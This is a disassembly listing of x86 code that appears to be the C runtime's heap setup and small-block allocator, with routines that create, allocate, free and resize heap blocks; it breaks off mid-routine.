push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_423AD0
add esp, 0Ch
test eax, eax
jnz short loc_4270FB
lea eax, [ebp+var_122C]
jmp short loc_427144
; ---------------------------------------------------------------------------
loc_4270FB: ; CODE XREF: sub_427054+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_42F154 ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_42712F
loc_42711C: ; CODE XREF: sub_427054+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_42712A
cmp al, 7Ah
jg short loc_42712A
sub al, 20h
mov [ecx], al
loc_42712A: ; CODE XREF: sub_427054+CC�j
; sub_427054+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_42711C
loc_42712F: ; CODE XREF: sub_427054+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_4235C0
pop ecx
pop ecx
loc_427144: ; CODE XREF: sub_427054+A5�j
cmp eax, ebx
jz short loc_427186
push 2Ch
push eax
call sub_4233B0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_427186
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_42716B
loc_42715D: ; CODE XREF: sub_427054+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_427166
mov [ecx], bl
jmp short loc_427167
; ---------------------------------------------------------------------------
loc_427166: ; CODE XREF: sub_427054+10C�j
inc ecx
loc_427167: ; CODE XREF: sub_427054+110�j
cmp [ecx], bl
jnz short loc_42715D
loc_42716B: ; CODE XREF: sub_427054+107�j
push 0Ah
push ebx
push eax
call sub_42289C
add esp, 0Ch
cmp eax, 2
jz short loc_427199
cmp eax, 3
jz short loc_427199
cmp eax, 1
jz short loc_427199
loc_427186: ; CODE XREF: sub_427054+5C�j
; sub_427054+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_427027
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_427199: ; CODE XREF: sub_427054+3E�j
; sub_427054+126�j ...
pop ebx
leave
retn
sub_427054 endp
; =============== S U B R O U T I N E =======================================
sub_42719C proc near ; CODE XREF: .text:00424F1C�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_42F1C0 ; HeapCreate
test eax, eax
mov dword_6319BC, eax
jz short loc_4271F2
call sub_427054
cmp eax, 3
mov dword_6319C0, eax
jnz short loc_4271D8
push 3F8h
call sub_4271F9
pop ecx
jmp short loc_4271E2
; ---------------------------------------------------------------------------
loc_4271D8: ; CODE XREF: sub_42719C+2D�j
cmp eax, 2
jnz short loc_4271F5
call sub_427D40
loc_4271E2: ; CODE XREF: sub_42719C+3A�j
test eax, eax
jnz short loc_4271F5
push dword_6319BC
call dword_42F1C4 ; HeapDestroy
loc_4271F2: ; CODE XREF: sub_42719C+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4271F5: ; CODE XREF: sub_42719C+3F�j
; sub_42719C+48�j
push 1
pop eax
retn
sub_42719C endp
; =============== S U B R O U T I N E =======================================
sub_4271F9 proc near ; CODE XREF: sub_42719C+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
test eax, eax
mov dword_6319B4, eax
jnz short loc_427216
retn
; ---------------------------------------------------------------------------
loc_427216: ; CODE XREF: sub_4271F9+1A�j
mov ecx, [esp+arg_0]
and dword_6319AC, 0
and dword_6319B0, 0
push 1
mov dword_6319A8, eax
mov dword_6319B8, ecx
mov dword_6319A0, 10h
pop eax
retn
sub_4271F9 endp
; =============== S U B R O U T I N E =======================================
sub_427241 proc near ; CODE XREF: sub_4230B3+45�p
; sub_4285CC+73�p ...
arg_0 = dword ptr 4
mov eax, dword_6319B0
lea ecx, [eax+eax*4]
mov eax, dword_6319B4
lea ecx, [eax+ecx*4]
loc_427251: ; CODE XREF: sub_427241+26�j
cmp eax, ecx
jnb short loc_427269
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_42726B
add eax, 14h
jmp short loc_427251
; ---------------------------------------------------------------------------
loc_427269: ; CODE XREF: sub_427241+12�j
xor eax, eax
locret_42726B: ; CODE XREF: sub_427241+21�j
retn
sub_427241 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42726C proc near ; CODE XREF: sub_4230B3+54�p
; sub_4285CC+D0�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_427590
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_427342
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_4272D0
push 3Fh
pop edx
loc_4272D0: ; CODE XREF: sub_42726C+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_427324
cmp edx, 20h
jnb short loc_4272FB
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_42731C
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_42731C
; ---------------------------------------------------------------------------
loc_4272FB: ; CODE XREF: sub_42726C+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_42731C
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_42731C: ; CODE XREF: sub_42726C+86�j
; sub_42726C+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_427327
; ---------------------------------------------------------------------------
loc_427324: ; CODE XREF: sub_42726C+6A�j
mov ecx, [ebp+var_4]
loc_427327: ; CODE XREF: sub_42726C+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_427342: ; CODE XREF: sub_42726C+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_427350
push 3Fh
pop edx
loc_427350: ; CODE XREF: sub_42726C+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_4273F3
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_427375
mov ebx, esi
loc_427375: ; CODE XREF: sub_42726C+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_427387
mov edx, esi
loc_427387: ; CODE XREF: sub_42726C+117�j
cmp ebx, edx
jz short loc_4273EE
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_4273D6
cmp ebx, 20h
jnb short loc_4273B7
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4273D6
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_4273D6
; ---------------------------------------------------------------------------
loc_4273B7: ; CODE XREF: sub_42726C+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_4273D6
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_4273D6: ; CODE XREF: sub_42726C+128�j
; sub_42726C+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_4273EE: ; CODE XREF: sub_42726C+11D�j
mov esi, [ebp+arg_4]
jmp short loc_4273F6
; ---------------------------------------------------------------------------
loc_4273F3: ; CODE XREF: sub_42726C+ED�j
mov ebx, [ebp+arg_0]
loc_4273F6: ; CODE XREF: sub_42726C+185�j
cmp [ebp+var_C], 0
jnz short loc_427404
cmp ebx, edx
jz loc_427485
loc_427404: ; CODE XREF: sub_42726C+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_427485
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_42745C
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42744B
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_42744B: ; CODE XREF: sub_42726C+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_427485
; ---------------------------------------------------------------------------
loc_42745C: ; CODE XREF: sub_42726C+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_427472
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_427472: ; CODE XREF: sub_42726C+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_427485: ; CODE XREF: sub_42726C+192�j
; sub_42726C+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_427590
mov eax, dword_6319AC
test eax, eax
jz loc_427582
mov ecx, dword_6319A4
mov esi, dword_42F1BC
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; dword_42F1BC
mov ecx, dword_6319A4
mov eax, dword_6319AC
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_6319AC
mov ecx, dword_6319A4
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_6319AC
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_6319AC
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_427513
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_6319AC
loc_427513: ; CODE XREF: sub_42726C+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_427582
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; dword_42F1BC
mov eax, dword_6319AC
push dword ptr [eax+10h]
push 0
push dword_6319BC
call dword_42F1F0 ; RtlFreeHeap
mov eax, dword_6319B0
mov edx, dword_6319B4
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_6319AC
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_423C20
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_6319B0
cmp eax, dword_6319AC
jbe short loc_427578
sub [ebp+arg_0], 14h
loc_427578: ; CODE XREF: sub_42726C+306�j
mov eax, dword_6319B4
mov dword_6319A8, eax
loc_427582: ; CODE XREF: sub_42726C+234�j
; sub_42726C+2AB�j
mov eax, [ebp+arg_0]
mov dword_6319A4, edi
mov dword_6319AC, eax
loc_427590: ; CODE XREF: sub_42726C+38�j
; sub_42726C+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_42726C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427595 proc near ; CODE XREF: sub_422FB7+49�p
; sub_423F63+78�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_6319B0
mov edx, dword_6319B4
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4275D5
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_4275E5
; ---------------------------------------------------------------------------
loc_4275D5: ; CODE XREF: sub_427595+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_4275E5: ; CODE XREF: sub_427595+3E�j
mov eax, dword_6319A8
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_42760C
loc_4275F3: ; CODE XREF: sub_427595+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42760C
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_4275F3
loc_42760C: ; CODE XREF: sub_427595+5C�j
; sub_427595+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_42768A
mov ebx, edx
loc_427613: ; CODE XREF: sub_427595+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42762F
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_42762D
add ebx, 14h
jmp short loc_427613
; ---------------------------------------------------------------------------
loc_42762D: ; CODE XREF: sub_427595+91�j
cmp ebx, eax
loc_42762F: ; CODE XREF: sub_427595+83�j
jnz short loc_42768A
loc_427631: ; CODE XREF: sub_427595+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_427647
cmp dword ptr [ebx+8], 0
jnz short loc_427644
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_427631
; ---------------------------------------------------------------------------
loc_427644: ; CODE XREF: sub_427595+A5�j
cmp ebx, [ebp+var_4]
loc_427647: ; CODE XREF: sub_427595+9F�j
jnz short loc_42766F
mov ebx, edx
loc_42764B: ; CODE XREF: sub_427595+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_42765F
cmp dword ptr [ebx+8], 0
jnz short loc_42765D
add ebx, 14h
jmp short loc_42764B
; ---------------------------------------------------------------------------
loc_42765D: ; CODE XREF: sub_427595+C1�j
cmp ebx, eax
loc_42765F: ; CODE XREF: sub_427595+BB�j
jnz short loc_42766F
call sub_42789E
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_427683
loc_42766F: ; CODE XREF: sub_427595:loc_427647�j
; sub_427595:loc_42765F�j
push ebx
call sub_42794F
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_42768A
loc_427683: ; CODE XREF: sub_427595+D8�j
xor eax, eax
jmp loc_427899
; ---------------------------------------------------------------------------
loc_42768A: ; CODE XREF: sub_427595+7A�j
; sub_427595:loc_42762F�j ...
mov dword_6319A8, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4276B1
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4276E8
loc_4276B1: ; CODE XREF: sub_427595+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_4276E5
loc_4276CE: ; CODE XREF: sub_427595+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4276CE
loc_4276E5: ; CODE XREF: sub_427595+137�j
mov edx, [ebp+var_4]
loc_4276E8: ; CODE XREF: sub_427595+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_427711
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_427711: ; CODE XREF: sub_427595+16D�j
; sub_427595+183�j
test ecx, ecx
jl short loc_42771A
shl ecx, 1
inc edi
jmp short loc_427711
; ---------------------------------------------------------------------------
loc_42771A: ; CODE XREF: sub_427595+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_427737
push 3Fh
pop esi
loc_427737: ; CODE XREF: sub_427595+19D�j
cmp esi, edi
jz loc_42784C
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4277A8
cmp edi, 20h
jge short loc_427777
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4277A5
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4277A8
; ---------------------------------------------------------------------------
loc_427777: ; CODE XREF: sub_427595+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4277A5
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4277A8
; ---------------------------------------------------------------------------
loc_4277A5: ; CODE XREF: sub_427595+1D6�j
; sub_427595+203�j
mov ebx, [ebp+arg_0]
loc_4277A8: ; CODE XREF: sub_427595+1B0�j
; sub_427595+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_427858
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_427849
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_42781A
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_427808
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_427808: ; CODE XREF: sub_427595+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_427849
; ---------------------------------------------------------------------------
loc_42781A: ; CODE XREF: sub_427595+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_427833
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_427833: ; CODE XREF: sub_427595+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_427849: ; CODE XREF: sub_427595+24E�j
; sub_427595+283�j
mov ecx, [ebp+var_8]
loc_42784C: ; CODE XREF: sub_427595+1A4�j
test ecx, ecx
jz short loc_42785B
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_42785B
; ---------------------------------------------------------------------------
loc_427858: ; CODE XREF: sub_427595+229�j
mov ecx, [ebp+var_8]
loc_42785B: ; CODE XREF: sub_427595+2B9�j
; sub_427595+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_427891
cmp ebx, dword_6319AC
jnz short loc_427891
mov ecx, [ebp+var_4]
cmp ecx, dword_6319A4
jnz short loc_427891
and dword_6319AC, 0
loc_427891: ; CODE XREF: sub_427595+2E0�j
; sub_427595+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_427899: ; CODE XREF: sub_427595+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_427595 endp
; =============== S U B R O U T I N E =======================================
sub_42789E proc near ; CODE XREF: sub_427595+CC�p
mov eax, dword_6319B0
mov ecx, dword_6319A0
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_4278E1
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_6319B4
push edi
push dword_6319BC
call dword_42F1B4 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_427931
add dword_6319A0, 10h
mov dword_6319B4, eax
mov eax, dword_6319B0
loc_4278E1: ; CODE XREF: sub_42789E+11�j
mov ecx, dword_6319B4
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_6319BC
lea esi, [ecx+eax*4]
call dword_42F1EC ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_427931
push 4
push 2000h
push 100000h
push edi
call dword_42F1B8 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_427935
push dword ptr [esi+10h]
push edi
push dword_6319BC
call dword_42F1F0 ; RtlFreeHeap
loc_427931: ; CODE XREF: sub_42789E+30�j
; sub_42789E+67�j
xor eax, eax
jmp short loc_42794C
; ---------------------------------------------------------------------------
loc_427935: ; CODE XREF: sub_42789E+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_6319B0
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_42794C: ; CODE XREF: sub_42789E+95�j
pop edi
pop esi
retn
sub_42789E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42794F proc near ; CODE XREF: sub_427595+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_427961: ; CODE XREF: sub_42794F+19�j
test eax, eax
jl short loc_42796A
shl eax, 1
inc ebx
jmp short loc_427961
; ---------------------------------------------------------------------------
loc_42796A: ; CODE XREF: sub_42794F+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_42797F: ; CODE XREF: sub_42794F+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_42797F
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call dword_42F1B8 ; VirtualAlloc
test eax, eax
jnz short loc_4279B2
or eax, 0FFFFFFFFh
jmp loc_427A45
; ---------------------------------------------------------------------------
loc_4279B2: ; CODE XREF: sub_42794F+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_4279F8
lea eax, [edi+10h]
loc_4279BF: ; CODE XREF: sub_42794F+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4279BF
loc_4279F8: ; CODE XREF: sub_42794F+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_427A35
or [eax+4], edi
loc_427A35: ; CODE XREF: sub_42794F+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_427A45: ; CODE XREF: sub_42794F+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_42794F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427A4A proc near ; CODE XREF: sub_4285CC+8F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_427BF8
test bl, 1
jnz loc_427BF1
add ebx, ecx
cmp esi, ebx
jg loc_427BF1
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_427AC1
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_427AC1: ; CODE XREF: sub_427A4A+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_427B11
cmp ecx, 20h
jnb short loc_427AED
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_427B11
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_427B11
; ---------------------------------------------------------------------------
loc_427AED: ; CODE XREF: sub_427A4A+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_427B11
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_427B11: ; CODE XREF: sub_427A4A+7D�j
; sub_427A4A+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_427BDF
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_427B4B
push 3Fh
pop edi
loc_427B4B: ; CODE XREF: sub_427A4A+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_427BCD
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_427BA4
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_427B97
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_427B97: ; CODE XREF: sub_427A4A+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_427BC9
; ---------------------------------------------------------------------------
loc_427BA4: ; CODE XREF: sub_427A4A+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_427BBA
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_427BBA: ; CODE XREF: sub_427A4A+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
